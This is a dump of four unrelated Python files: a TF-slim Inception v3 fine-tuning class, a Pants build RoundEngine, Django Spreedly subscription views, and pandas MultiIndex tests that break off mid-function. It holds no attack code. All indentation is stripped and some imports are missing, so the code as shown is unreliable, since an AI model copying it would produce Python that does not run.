from preprocessing import preprocessing_factory
import numpy as np
class SlimTrainMgr():
def __init__(self):
self.dataset_name = 'flowers'
self.dataset_split_name = 'train'
self.dataset_dir = '/home/levin/workspace/detection/data/flower'
self.num_readers = 4
self.batch_size = 32
self.labels_offset = 0
self.train_image_size = None
self.model_name = 'inception_v3' #'The name of the architecture to train.'
self.weight_decay = 0.00004 # 'The weight decay on the model weights.'
self.preprocessing_name = None
self.num_preprocessing_threads = 4
self.num_epochs_per_decay = 2.0
self.learning_rate_decay_type = 'exponential'
self.end_learning_rate = 0.0001
self.learning_rate = 0.01
#optimiser
self.optimizer = 'rmsprop'
self.adadelta_rho = 0.95
self.opt_epsilon= 1.0
self.adagrad_initial_accumulator_value= 0.1
self.adam_beta1= 0.9
self.adam_beta2= 0.999
self.ftrl_learning_rate_power = -0.5
self.ftrl_initial_accumulator_value = 0.1
self.ftrl_l1= 0.0
self.ftrl_l2 = 0.0
self.momentum= 0.9
self.rmsprop_decay = 0.9
self.rmsprop_momentum = 0.9
self.train_dir = '/tmp/tfmodel/'
self.max_number_of_steps = None
self.log_every_n_steps = 10
self.save_summaries_secs = 600
self.save_interval_secs= 600
self.checkpoint_path = None
self.checkpoint_exclude_scopes = None
self.ignore_missing_vars = False
self.label_smoothing = 0
return
def __get_images_labels(self):
dataset = dataset_factory.get_dataset(
self.dataset_name, self.dataset_split_name, self.dataset_dir)
provider = slim.dataset_data_provider.DatasetDataProvider(
dataset,
num_readers=self.num_readers,
common_queue_capacity=20 * self.batch_size,
common_queue_min=10 * self.batch_size)
[image, label] = provider.get(['image', 'label'])
label -= self.labels_offset
network_fn = nets_factory.get_network_fn(
self.model_name,
num_classes=(dataset.num_classes - self.labels_offset),
weight_decay=self.weight_decay,
is_training=True)
train_image_size = self.train_image_size or network_fn.default_image_size
preprocessing_name = self.preprocessing_name or self.model_name
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
preprocessing_name,
is_training=True)
image = image_preprocessing_fn(image, train_image_size, train_image_size)
images, labels = tf.train.batch(
[image, label],
batch_size=self.batch_size,
num_threads=self.num_preprocessing_threads,
capacity=5 * self.batch_size)
labels = slim.one_hot_encoding(
labels, dataset.num_classes - self.labels_offset)
batch_queue = slim.prefetch_queue.prefetch_queue(
[images, labels], capacity=2)
images, labels = batch_queue.dequeue()
self.network_fn = network_fn
self.dataset = dataset
#set up the network
return images, labels
def __configure_learning_rate(self, num_samples_per_epoch, global_step):
"""Configures the learning rate.
Args:
num_samples_per_epoch: The number of samples in each epoch of training.
global_step: The global_step tensor.
Returns:
A `Tensor` representing the learning rate.
Raises:
ValueError: if
"""
decay_steps = int(num_samples_per_epoch / self.batch_size *
self.num_epochs_per_decay)
if self.learning_rate_decay_type == 'exponential':
return tf.train.exponential_decay(self.learning_rate,
global_step,
decay_steps,
self.learning_rate_decay_factor,
staircase=True,
name='exponential_decay_learning_rate')
elif self.learning_rate_decay_type == 'fixed':
return tf.constant(self.learning_rate, name='fixed_learning_rate')
elif self.learning_rate_decay_type == 'polynomial':
return tf.train.polynomial_decay(self.learning_rate,
global_step,
decay_steps,
self.end_learning_rate,
power=1.0,
cycle=False,
name='polynomial_decay_learning_rate')
else:
raise ValueError('learning_rate_decay_type [%s] was not recognized',
self.learning_rate_decay_type)
return
def __configure_optimizer(self, learning_rate):
"""Configures the optimizer used for training.
Args:
learning_rate: A scalar or `Tensor` learning rate.
Returns:
An instance of an optimizer.
Raises:
ValueError: if FLAGS.optimizer is not recognized.
"""
if self.optimizer == 'adadelta':
optimizer = tf.train.AdadeltaOptimizer(
learning_rate,
rho=self.adadelta_rho,
epsilon=self.opt_epsilon)
elif self.optimizer == 'adagrad':
optimizer = tf.train.AdagradOptimizer(
learning_rate,
initial_accumulator_value=self.adagrad_initial_accumulator_value)
elif self.optimizer == 'adam':
optimizer = tf.train.AdamOptimizer(
learning_rate,
beta1=self.adam_beta1,
beta2=self.adam_beta2,
epsilon=self.opt_epsilon)
elif self.optimizer == 'ftrl':
optimizer = tf.train.FtrlOptimizer(
learning_rate,
learning_rate_power=self.ftrl_learning_rate_power,
initial_accumulator_value=self.ftrl_initial_accumulator_value,
l1_regularization_strength=self.ftrl_l1,
l2_regularization_strength=self.ftrl_l2)
elif self.optimizer == 'momentum':
optimizer = tf.train.MomentumOptimizer(
learning_rate,
momentum=self.momentum,
name='Momentum')
elif self.optimizer == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(
learning_rate,
decay=self.rmsprop_decay,
momentum=self.rmsprop_momentum,
epsilon=self.opt_epsilon)
elif self.optimizer == 'sgd':
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
else:
raise ValueError('Optimizer [%s] was not recognized', self.optimizer)
return optimizer
def __get_variables_to_train(self):
"""Returns a list of variables to train.
Returns:
A list of variables to train by the optimizer.
"""
if self.trainable_scopes is None:
return tf.trainable_variables()
else:
scopes = [scope.strip() for scope in self.trainable_scopes.split(',')]
variables_to_train = []
for scope in scopes:
variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
variables_to_train.extend(variables)
return variables_to_train
def __setup_training(self,images, labels):
tf.logging.set_verbosity(tf.logging.INFO)
logits, end_points = self.network_fn(images)
#############################
# Specify the loss function #
#############################
loss_1 = None
if 'AuxLogits' in end_points:
loss_1 = tf.losses.softmax_cross_entropy(
logits=end_points['AuxLogits'], onehot_labels=labels,
label_smoothing=self.label_smoothing, weights=0.4, scope='aux_loss')
total_loss = tf.losses.softmax_cross_entropy(
logits=logits, onehot_labels=labels,
label_smoothing=self.label_smoothing, weights=1.0)
if loss_1 is not None:
total_loss = total_loss + loss_1
global_step = slim.create_global_step()
# Variables to train.
variables_to_train = self.__get_variables_to_train()
learning_rate = self.__configure_learning_rate(self.dataset.num_samples, global_step)
optimizer = self.__configure_optimizer(learning_rate)
train_op = slim.learning.create_train_op(total_loss, optimizer, variables_to_train=variables_to_train)
self.__add_summaries(end_points, learning_rate, total_loss)
###########################
# Kicks off the training. #
###########################
slim.learning.train(
train_op,
logdir=self.train_dir,
init_fn=self.__get_init_fn(),
number_of_steps=self.max_number_of_steps,
log_every_n_steps=self.log_every_n_steps,
save_summaries_secs=self.save_summaries_secs,
save_interval_secs=self.save_interval_secs)
return
def __add_summaries(self,end_points,learning_rate,total_loss):
for end_point in end_points:
x = end_points[end_point]
tf.summary.histogram('activations/' + end_point, x)
tf.summary.scalar('sparsity/' + end_point, tf.nn.zero_fraction(x))
for loss in tf.get_collection(tf.GraphKeys.LOSSES):
tf.summary.scalar('losses/%s' % loss.op.name, loss)
# Add total_loss to summary.
tf.summary.scalar('total_loss', total_loss)
# Add summaries for variables.
for variable in slim.get_model_variables():
tf.summary.histogram(variable.op.name, variable)
tf.summary.scalar('learning_rate', learning_rate)
return
def __get_init_fn(self):
"""Returns a function run by the chief worker to warm-start the training.
Note that the init_fn is only run when initializing the model during the very
first global step.
Returns:
An init function run by the supervisor.
"""
if self.checkpoint_path is None:
return None
# Warn the user if a checkpoint exists in the train_dir. Then we'll be
# ignoring the checkpoint anyway.
if tf.train.latest_checkpoint(self.train_dir):
tf.logging.info(
'Ignoring --checkpoint_path because a checkpoint already exists in %s'
% self.train_dir)
return None
exclusions = []
if self.checkpoint_exclude_scopes:
exclusions = [scope.strip()
for scope in self.checkpoint_exclude_scopes.split(',')]
# TODO(sguada) variables.filter_variables()
variables_to_restore = []
for var in slim.get_model_variables():
excluded = False
for exclusion in exclusions:
if var.op.name.startswith(exclusion):
excluded = True
break
if not excluded:
variables_to_restore.append(var)
if tf.gfile.IsDirectory(self.checkpoint_path):
checkpoint_path = tf.train.latest_checkpoint(self.checkpoint_path)
else:
checkpoint_path = self.checkpoint_path
tf.logging.info('Fine-tuning from %s' % checkpoint_path)
return slim.assign_from_checkpoint_fn(
checkpoint_path,
variables_to_restore,
ignore_missing_vars=self.ignore_missing_vars)
def run(self):
#fine tune the new parameters
self.train_dir = '/tmp/flowers-models/inception_v3'
self.dataset_name = 'flowers'
self.dataset_split_name = 'train'
self.dataset_dir = '/home/levin/workspace/detection/data/flower'
self.model_name = 'inception_v3'
self.checkpoint_path = '/home/levin/workspace/detection/data/trained_models/inception_v3/inception_v3.ckpt'
self.checkpoint_exclude_scopes = 'InceptionV3/Logits,InceptionV3/AuxLogits'
self.trainable_scopes = 'InceptionV3/Logits,InceptionV3/AuxLogits'
self.max_number_of_steps = 1000
self.batch_size= 32
self.learning_rate = 0.01
self.learning_rate_decay_type = 'fixed'
self.save_interval_secs = 600
self.save_summaries_secs= 60
self.log_every_n_steps = 100
self.optimizer = 'rmsprop'
self.weight_decay = 0.00004
#fine tune all parameters
self.train_dir = '/tmp/flowers-models/inception_v3/all'
self.checkpoint_path = '/tmp/flowers-models/inception_v3'
self.checkpoint_exclude_scopes = None
self.trainable_scopes = None
self.max_number_of_steps = 500
self.learning_rate=0.0001
self.log_every_n_steps = 10
images, labels = self.__get_images_labels()
self.__setup_training(images, labels)
return
if __name__ == "__main__":
obj= SlimTrainMgr()
obj.run()
| |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from collections import OrderedDict, namedtuple
from twitter.common.collections.orderedset import OrderedSet
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnit
from pants.engine.engine import Engine
from pants.engine.round_manager import RoundManager
class GoalExecutor(object):
def __init__(self, context, goal, tasktypes_by_name):
self._context = context
self._goal = goal
self._tasktypes_by_name = tasktypes_by_name
@property
def goal(self):
return self._goal
def attempt(self, explain):
"""Attempts to execute the goal's tasks in installed order.
:param bool explain: If ``True`` then the goal plan will be explained instead of being
executed.
"""
goal_workdir = os.path.join(self._context.options.for_global_scope().pants_workdir,
self._goal.name)
with self._context.new_workunit(name=self._goal.name, labels=[WorkUnit.GOAL]):
for name, task_type in reversed(self._tasktypes_by_name.items()):
with self._context.new_workunit(name=name, labels=[WorkUnit.TASK]):
if explain:
self._context.log.debug('Skipping execution of {} in explain mode'.format(name))
else:
task_workdir = os.path.join(goal_workdir, name)
task = task_type(self._context, task_workdir)
task.execute()
if explain:
reversed_tasktypes_by_name = reversed(self._tasktypes_by_name.items())
goal_to_task = ', '.join(
'{}->{}'.format(name, task_type.__name__) for name, task_type in reversed_tasktypes_by_name)
print('{goal} [{goal_to_task}]'.format(goal=self._goal.name, goal_to_task=goal_to_task))
class RoundEngine(Engine):
class DependencyError(ValueError):
"""Indicates a Task has an unsatisfiable data dependency."""
class GoalCycleError(DependencyError):
"""Indicates there is a cycle in the goal dependency graph."""
class TaskOrderError(DependencyError):
"""Indicates a task depends on data produced by another task in the same goal that is
scheduled to runs after it.
"""
class MissingProductError(DependencyError):
"""Indicates an expressed data dependency if not provided by any installed task."""
GoalInfo = namedtuple('GoalInfo', ['goal', 'tasktypes_by_name', 'goal_dependencies'])
def _topological_sort(self, goal_info_by_goal):
dependees_by_goal = OrderedDict()
def add_dependee(goal, dependee=None):
dependees = dependees_by_goal.get(goal)
if dependees is None:
dependees = set()
dependees_by_goal[goal] = dependees
if dependee:
dependees.add(dependee)
for goal, goal_info in goal_info_by_goal.items():
add_dependee(goal)
for dependency in goal_info.goal_dependencies:
add_dependee(dependency, goal)
satisfied = set()
while dependees_by_goal:
count = len(dependees_by_goal)
for goal, dependees in dependees_by_goal.items():
unsatisfied = len(dependees - satisfied)
if unsatisfied == 0:
satisfied.add(goal)
dependees_by_goal.pop(goal)
yield goal_info_by_goal[goal]
break
if len(dependees_by_goal) == count:
for dependees in dependees_by_goal.values():
dependees.difference_update(satisfied)
# TODO(John Sirois): Do a better job here and actually collect and print cycle paths
# between Goals/Tasks. The developer can most directly address that data.
raise self.GoalCycleError('Cycle detected in goal dependencies:\n\t{0}'
.format('\n\t'.join('{0} <- {1}'.format(goal, list(dependees))
for goal, dependees
in dependees_by_goal.items())))
class TargetRootsReplacement(object):
class ConflictingProposalsError(Exception):
"""Indicates conflicting proposals for a target root replacement in a single pants run."""
def __init__(self):
self._proposer = None
self._target_roots = None
def propose_alternates(self, proposer, target_roots):
if target_roots:
if self._target_roots and (self._target_roots != target_roots):
raise self.ConflictingProposalsError(
'Already have a proposal by {0} for {1} and cannot accept conflicting proposal '
'by {2} for {3}.'.format(self._proposer, self._target_roots, proposer, target_roots))
self._proposer = proposer
self._target_roots = target_roots
def apply(self, context):
if self._target_roots:
context._replace_targets(self._target_roots)
def _visit_goal(self, goal, context, goal_info_by_goal, target_roots_replacement):
if goal in goal_info_by_goal:
return
tasktypes_by_name = OrderedDict()
goal_dependencies = set()
visited_task_types = set()
for task_name in reversed(goal.ordered_task_names()):
task_type = goal.task_type_by_name(task_name)
tasktypes_by_name[task_name] = task_type
visited_task_types.add(task_type)
alternate_target_roots = task_type._alternate_target_roots(context.options,
context.address_mapper,
context.build_graph)
target_roots_replacement.propose_alternates(task_type, alternate_target_roots)
round_manager = RoundManager(context)
task_type._prepare(context.options, round_manager)
try:
dependencies = round_manager.get_dependencies()
for producer_info in dependencies:
producer_goal = producer_info.goal
if producer_goal == goal:
if producer_info.task_type in visited_task_types:
ordering = '\n\t'.join("[{0}] '{1}' {2}".format(i, tn,
goal.task_type_by_name(tn).__name__)
for i, tn in enumerate(goal.ordered_task_names()))
raise self.TaskOrderError(
"TaskRegistrar '{name}' with action {consumer_task} depends on {data} from task "
"{producer_task} which is ordered after it in the '{goal}' goal:\n\t{ordering}"
.format(name=task_name,
consumer_task=task_type.__name__,
data=producer_info.product_type,
producer_task=producer_info.task_type.__name__,
goal=goal.name,
ordering=ordering))
else:
# We don't express dependencies on downstream tasks in this same goal.
pass
else:
goal_dependencies.add(producer_goal)
except round_manager.MissingProductError as e:
raise self.MissingProductError(
"Could not satisfy data dependencies for goal '{name}' with action {action}: {error}"
.format(name=task_name, action=task_type.__name__, error=e))
goal_info = self.GoalInfo(goal, tasktypes_by_name, goal_dependencies)
goal_info_by_goal[goal] = goal_info
for goal_dependency in goal_dependencies:
self._visit_goal(goal_dependency, context, goal_info_by_goal, target_roots_replacement)
def _prepare(self, context, goals):
if len(goals) == 0:
raise TaskError('No goals to prepare')
goal_info_by_goal = OrderedDict()
target_roots_replacement = self.TargetRootsReplacement()
for goal in reversed(OrderedSet(goals)):
self._visit_goal(goal, context, goal_info_by_goal, target_roots_replacement)
target_roots_replacement.apply(context)
for goal_info in reversed(list(self._topological_sort(goal_info_by_goal))):
yield GoalExecutor(context, goal_info.goal, goal_info.tasktypes_by_name)
def attempt(self, context, goals):
goal_executors = list(self._prepare(context, goals))
execution_goals = ' -> '.join(e.goal.name for e in goal_executors)
context.log.info('Executing tasks in goals: {goals}'.format(goals=execution_goals))
explain = context.options.for_global_scope().explain
if explain:
print('Goal Execution Order:\n\n{}\n'.format(execution_goals))
print('Goal [TaskRegistrar->Task] Order:\n')
serialized_goals_executors = [ge for ge in goal_executors if ge.goal.serialize]
outer_lock_holder = serialized_goals_executors[-1] if serialized_goals_executors else None
if outer_lock_holder:
context.acquire_lock()
try:
for goal_executor in goal_executors:
goal_executor.attempt(explain)
if goal_executor is outer_lock_holder:
context.release_lock()
outer_lock_holder = None
finally:
if outer_lock_holder:
context.release_lock()
| |
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.core.exceptions import SuspiciousOperation
from django.utils.decorators import classonlymethod
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_lazy as _
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.models import User
from django.template import RequestContext
from django.core.cache import cache
from django.conf import settings
from django import forms
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import (ListView, TemplateView, View, FormView,
DetailView, UpdateView)
from django.views.generic.edit import FormMixin
from django.core.urlresolvers import reverse
from pyspreedly.api import Client
from spreedly.models import Plan, Subscription
import spreedly.settings as spreedly_settings
from spreedly.forms import SubscribeForm, SubscribeUpdateForm
from spreedly import signals
class SubscribeMixin(FormMixin):
"""
inherits from FormMixin, handles, get_success_url, form valid, invalid and
post. Needs to be integerated into get context data and get_success_url
"""
form_class = SubscribeForm
success_url = 'spreedly_email_sent'
def get_success_url(self):
return reverse(self.success_url, args=[self.request.user_id])
def form_valid(self, form):
form.save()
super(SubscribeMixin, self).form_valid(form)
def form_invalid(self, form):
self.render_to_response(self.get_context_data(
object_list=self.object_list, form=form))
def post(self):
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
class PlanList(SubscribeMixin, ListView):
"""
inherits from :py:class:`ListView` and :py:class:`FormMixin`, hybrid list and
subscription entry view.
default template name is `spreedly_plan_list.html`,
object_list name is `plans`
cache's plans for 24 hours
"""
template_name = "spreedly/plan_list.html"
model = Plan
context_object_name = 'plans'
def get_context_data(self, object_list, **kwargs):
"""
Adds form and object list plus whatever else is passed as a kwarg
to the context.
:param object_list: list of :py:class:`Plan`s (actually queryset)
"""
context = ListView.get_context_data(self, object_list=object_list)
context.update(SubscribeMixin.get_context_data(self, **kwargs))
if self.request.user.is_authenticated():
try:
context['current_user_subscription'] = self.request.user.subscription
except Subscription.DoesNotExist:
context['current_user_subscription'] = None
return context
def get_queryset(self):
"""
Gets and caches the plan list for 1 day
"""
cache_key = 'spreedly_plans_list'
plans = cache.get(cache_key)
if not plans:
Plan.objects.sync_plans()
plans = Plan.objects.enabled()
cache.set(cache_key, plans, 60*60*24)
return plans
def get(self, *args, **kwargs):
"""
Gets the form and object list and returns a rendered template
"""
form_class = self.get_form_class()
form = self.get_form(form_class)
self.object_list = self.get_queryset()
allow_empty = self.get_allow_empty()
if not allow_empty and len(self.object_list) == 0:
raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
% {'class_name': self.__class__.__name__})
context = self.get_context_data(object_list=self.object_list, form=form, **kwargs)
return self.render_to_response(context)
class EmailSent(TemplateView):
"""
A thankyou page for after registration saying an email has been sent
"""
template_name = 'spreedly/email_sent.html'
def get_context_data(self, *args, **kwargs):
self.context_data = super(EmailSent, self).get_context_data(*args, **kwargs)
self.context_data['user'] = get_object_or_404(User, pk=self.kwargs['user_id'])
return self.context_data
class SpreedlyReturn(TemplateView):
template_name = 'spreedly/return.html'
def create_subscription(self, user, plan):
if self.request.GET.has_key('trial') or plan.plan_type == 'free_trial':
if plan.trial_eligible(user):
subscription = plan.start_trial(user)
else:
raise SuspiciousOperation("Trial asked for - but you are not eligibile for a free trial")
else:
subscription = Subscription.objects.create_local(user, plan)
return subscription
def get_context_data(self, plan, subscription, *args, **kwargs):
# removed gift, request and login url
self.context_data = super(SpreedlyReturn,self).get_context_data(*args, **kwargs)
self.context_data['plan'] = plan
if self.request.GET.has_key('next'):
self.context_data['next'] = self.request.GET['next']
self.context_data['subscription'] = subscription
return self.context_data
def get(self,request, *args, **kwargs):
user = get_object_or_404(User, pk=self.kwargs['user_id'])
plan = get_object_or_404(Plan, pk=self.kwargs['plan_pk'])
subscription = self.create_subscription(user, plan)
context_data = self.get_context_data(plan, subscription, **kwargs)
return self.render_to_response(context_data)
@csrf_exempt
def spreedly_listener(request):
if request.method == 'POST':
# Try to extract customers' IDs
if request.POST.has_key('subscriber_ids'):
subscriber_ids = request.POST['subscriber_ids'].split(',')
if len(subscriber_ids):
client = Client(settings.SPREEDLY_AUTH_TOKEN, settings.SPREEDLY_SITE_NAME)
for id in subscriber_ids:
# Now let's query Spreedly API for the actual changes
data = client.get_info(int(id))
try:
user = User.objects.get(pk=id)
subscription, created = Subscription.objects.get_or_create(user=user)
for k, v in data.items():
if hasattr(subscription, k):
setattr(subscription, k, v)
subscription.save()
signals.subscription_update.send(sender=subscription, user=User.objects.get(id=id))
except User.DoesNotExist:
# TODO not sure what exactly to do here. Delete the subscripton on spreedly?
pass
return HttpResponse() #200 OK
class SubscriptionDetails(DetailView):
"""
view to see subscription details. takes subscription id as an optional
parameter. if it is not there return the user's subscription if available,
if not 404. if user.is_staff() - then you can see any Subscription details.
"""
model = Subscription
context_object_name = 'subscription'
template_name = 'spreedly/subscription_details.html'
pk_url_kwarg = 'user_id'
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
if not kwargs or not kwargs.get('user_id'):
kwargs['user_id'] = request.user.id
return super(SubscriptionDetails, self).dispatch(request, *args, **kwargs)
class PlanDetails(DetailView, SubscribeMixin):
model = Plan
pk_url_kwarg = 'plan_pk'
slug_url_kwarg = 'plan_pk'
context_object_name = 'plan'
template_name = 'spreedly/plan_details.html'
def get_context_data(self, **kwargs):
context = DetailView.get_context_data(self, **kwargs)
if self.request.user.is_authenticated():
context['current_user_subscription'] = getattr(self.request.user, 'subscription', None)
else:
context['current_user_subscription'] = None
return context
def get(self, *args, **kwargs):
self.object = self.get_object()
kwargs['object'] = self.object
form_class = self.get_form_class()
form = self.get_form(form_class)
form.fields['subscription'].widget = forms.HiddenInput()
form.fields['subscription'].initial = self.object
kwargs['form'] = form
context = self.get_context_data(**kwargs)
return self.render_to_response(context)
class EditSubscriber(UpdateView):
model = Subscription
form = SubscribeUpdateForm
def dispatch(self, *args, **kwargs):
raise NotImplementedError
| |
# -*- coding: utf-8 -*-
from itertools import product
import numpy as np
import pytest
from pandas._libs import hashtable
from pandas.compat import range, u
from pandas import DatetimeIndex, MultiIndex
import pandas.util.testing as tm
@pytest.mark.parametrize('names', [None, ['first', 'second']])
def test_unique(names):
mi = MultiIndex.from_arrays([[1, 2, 1, 2], [1, 1, 1, 2]], names=names)
res = mi.unique()
exp = MultiIndex.from_arrays([[1, 2, 2], [1, 1, 2]], names=mi.names)
tm.assert_index_equal(res, exp)
mi = MultiIndex.from_arrays([list('aaaa'), list('abab')],
names=names)
res = mi.unique()
exp = MultiIndex.from_arrays([list('aa'), list('ab')], names=mi.names)
tm.assert_index_equal(res, exp)
mi = MultiIndex.from_arrays([list('aaaa'), list('aaaa')], names=names)
res = mi.unique()
exp = MultiIndex.from_arrays([['a'], ['a']], names=mi.names)
tm.assert_index_equal(res, exp)
# GH #20568 - empty MI
mi = MultiIndex.from_arrays([[], []], names=names)
res = mi.unique()
tm.assert_index_equal(mi, res)
def test_unique_datetimelike():
idx1 = DatetimeIndex(['2015-01-01', '2015-01-01', '2015-01-01',
'2015-01-01', 'NaT', 'NaT'])
idx2 = DatetimeIndex(['2015-01-01', '2015-01-01', '2015-01-02',
'2015-01-02', 'NaT', '2015-01-01'],
tz='Asia/Tokyo')
result = MultiIndex.from_arrays([idx1, idx2]).unique()
eidx1 = DatetimeIndex(['2015-01-01', '2015-01-01', 'NaT', 'NaT'])
eidx2 = DatetimeIndex(['2015-01-01', '2015-01-02',
'NaT', '2015-01-01'],
tz='Asia/Tokyo')
exp = MultiIndex.from_arrays([eidx1, eidx2])
tm.assert_index_equal(result, exp)
@pytest.mark.parametrize('level', [0, 'first', 1, 'second'])
def test_unique_level(idx, level):
# GH #17896 - with level= argument
result = idx.unique(level=level)
expected = idx.get_level_values(level).unique()
tm.assert_index_equal(result, expected)
# With already unique level
mi = MultiIndex.from_arrays([[1, 3, 2, 4], [1, 3, 2, 5]],
names=['first', 'second'])
result = mi.unique(level=level)
expected = mi.get_level_values(level)
tm.assert_index_equal(result, expected)
# With empty MI
mi = MultiIndex.from_arrays([[], []], names=['first', 'second'])
result = mi.unique(level=level)
expected = mi.get_level_values(level)
@pytest.mark.parametrize('dropna', [True, False])
def test_get_unique_index(idx, dropna):
mi = idx[[0, 1, 0, 1, 1, 0, 0]]
expected = mi._shallow_copy(mi[[0, 1]])
result = mi._get_unique_index(dropna=dropna)
assert result.unique
tm.assert_index_equal(result, expected)
def test_duplicate_multiindex_codes():
# GH 17464
# Make sure that a MultiIndex with duplicate levels throws a ValueError
with pytest.raises(ValueError):
mi = MultiIndex([['A'] * 10, range(10)], [[0] * 10, range(10)])
# And that using set_levels with duplicate levels fails
mi = MultiIndex.from_arrays([['A', 'A', 'B', 'B', 'B'],
[1, 2, 1, 2, 3]])
with pytest.raises(ValueError):
mi.set_levels([['A', 'B', 'A', 'A', 'B'], [2, 1, 3, -2, 5]],
inplace=True)
@pytest.mark.parametrize('names', [['a', 'b', 'a'], [1, 1, 2],
[1, 'a', 1]])
def test_duplicate_level_names(names):
# GH18872, GH19029
mi = MultiIndex.from_product([[0, 1]] * 3, names=names)
assert mi.names == names
# With .rename()
mi = MultiIndex.from_product([[0, 1]] * 3)
mi = mi.rename(names)
assert mi.names == names
# With .rename(., level=)
mi.rename(names[1], level=1, inplace=True)
mi = mi.rename([names[0], names[2]], level=[0, 2])
assert mi.names == names
def test_duplicate_meta_data():
# GH 10115
mi = MultiIndex(
levels=[[0, 1], [0, 1, 2]],
codes=[[0, 0, 0, 0, 1, 1, 1],
[0, 1, 2, 0, 0, 1, 2]])
for idx in [mi,
mi.set_names([None, None]),
mi.set_names([None, 'Num']),
mi.set_names(['Upper', 'Num']), ]:
assert idx.has_duplicates
assert idx.drop_duplicates().names == idx.names
def test_has_duplicates(idx, idx_dup):
# see fixtures
assert idx.is_unique is True
assert idx.has_duplicates is False
assert idx_dup.is_unique is False
assert idx_dup.has_duplicates is True
mi = MultiIndex(levels=[[0, 1], [0, 1, 2]],
codes=[[0, 0, 0, 0, 1, 1, 1],
[0, 1, 2, 0, 0, 1, 2]])
assert mi.is_unique is False
assert mi.has_duplicates is True
# single instance of NaN
mi_nan = MultiIndex(levels=[['a', 'b'], [0, 1]],
codes=[[-1, 0, 0, 1, 1], [-1, 0, 1, 0, 1]])
assert mi_nan.is_unique is True
assert mi_nan.has_duplicates is False
# multiple instances of NaN
mi_nan_dup = MultiIndex(levels=[['a', 'b'], [0, 1]],
codes=[[-1, -1, 0, 0, 1, 1], [-1, -1, 0, 1, 0, 1]])
assert mi_nan_dup.is_unique is False
assert mi_nan_dup.has_duplicates is True
def test_has_duplicates_from_tuples():
# GH 9075
t = [(u('x'), u('out'), u('z'), 5, u('y'), u('in'), u('z'), 169),
(u('x'), u('out'), u('z'), 7, u('y'), u('in'), u('z'), 119),
(u('x'), u('out'), u('z'), 9, u('y'), u('in'), u('z'), 135),
(u('x'), u('out'), u('z'), 13, u('y'), u('in'), u('z'), 145),
(u('x'), u('out'), u('z'), 14, u('y'), u('in'), u('z'), 158),
(u('x'), u('out'), u('z'), 16, u('y'), u('in'), u('z'), 122),
(u('x'), u('out'), u('z'), 17, u('y'), u('in'), u('z'), 160),
(u('x'), u('out'), u('z'), 18, u('y'), u('in'), u('z'), 180),
(u('x'), u('out'), u('z'), 20, u('y'), u('in'), u('z'), 143),
(u('x'), u('out'), u('z'), 21, u('y'), u('in'), u('z'), 128),
(u('x'), u('out'), u('z'), 22, u('y'), u('in'), u('z'), 129),
(u('x'), u('out'), u('z'), 25, u('y'), u('in'), u('z'), 111),
(u('x'), u('out'), u('z'), 28, u('y'), u('in'), u('z'), 114),
(u('x'), u('out'), u('z'), 29, u('y'), u('in'), u('z'), 121),
(u('x'), u('out'), u('z'), 31, u('y'), u('in'), u('z'), 126),
(u('x'), u('out'), u('z'), 32, u('y'), u('in'), u('z'), 155),
(u('x'), u('out'), u('z'), 33, u('y'), u('in'), u('z'), 123),
(u('x'), u('out'), u('z'), 12, u('y'), u('in'), u('z'), 144)]
mi = MultiIndex.from_tuples(t)
assert not mi.has_duplicates
def test_has_duplicates_overflow():
# handle int64 overflow if possible
def check(nlevels, with_nulls):
codes = np.tile(np.arange(500), 2)
level = np.arange(500)
if with_nulls: # inject some null values
codes[500] = -1 # common nan value
codes = [codes.copy() for i in range(nlevels)]
for i in range(nlevels):
codes[i][500 + i - nlevels // 2] = -1
codes += [np.array([-1, 1]).repeat(500)]
else:
codes = [codes] * nlevels + [np.arange(2).repeat(500)]
levels = [level] * nlevels + [[0, 1]]
# no dups
mi = MultiIndex(levels=levels, codes=codes)
assert not mi.has_duplicates
# with a dup
if with_nulls:
def f(a):
return np.insert(a, 1000, a[0])
codes = list(map(f, codes))
mi = MultiIndex(levels=levels, codes=codes)
else:
values = mi.values.tolist()
mi = MultiIndex.from_tuples(values + [values[0]])
assert mi.has_duplicates
# no overflow
check(4, False)
check(4, True)
# overflow possible
check(8, False)
check(8, True)
@pytest.mark.parametrize('keep, expected', [
('first', np.array([False, False, False, True, True, False])),
('last', np.array([False, True, True, False, False, False])),
(False, np.array([False, True, True, True, True, False]))
])
def test_duplicated(idx_dup, keep, expected):
result = idx_dup.duplicated(keep=keep)
tm.assert_numpy_array_equal(result, expected)
@pytest.mark.parametrize('keep', ['first', 'last', False])
def test_duplicated_large(keep):
# GH 9125
n, k = 200, 5000
levels = [np.arange(n), tm.makeStringIndex(n), 1000 + np.arange(n)]
codes = [np.random.choice(n, k * n) for lev in levels]
mi = MultiIndex(levels=levels, codes=codes)
result = mi.duplicated(keep=keep)
expected = hashtable.duplicated_object(mi.values, keep=keep)
tm.assert_numpy_array_equal(result, expected)
def test_get_duplicates():
# GH5873
for a in [101, 102]:
mi = MultiIndex.from_arrays([[101, a], [3.5, np.nan]])
assert not mi.has_duplicates
with tm.assert_produces_warning(FutureWarning):
# Deprecated - see GH20239
assert mi.get_duplicates().equals(MultiIndex.from_arrays([[], []]))
tm.assert_numpy_array_equal(mi.duplicated(),
np.zeros(2, dtype='bool'))
for n in range(1, 6): # 1st level shape
for m in range(1, 5): # 2nd level shape
# all possible unique combinations, including nan
codes = product(range(-1, n), range(-1, m))
mi = MultiIndex(levels=[list('abcde')[:n], list('WXYZ')[:m]],
codes=np.random.permutation(list(codes)).T)
assert len(mi) == (n + 1) * (m + 1)
assert not mi.has_duplicates
with tm.assert_produces_warning(FutureWarning):
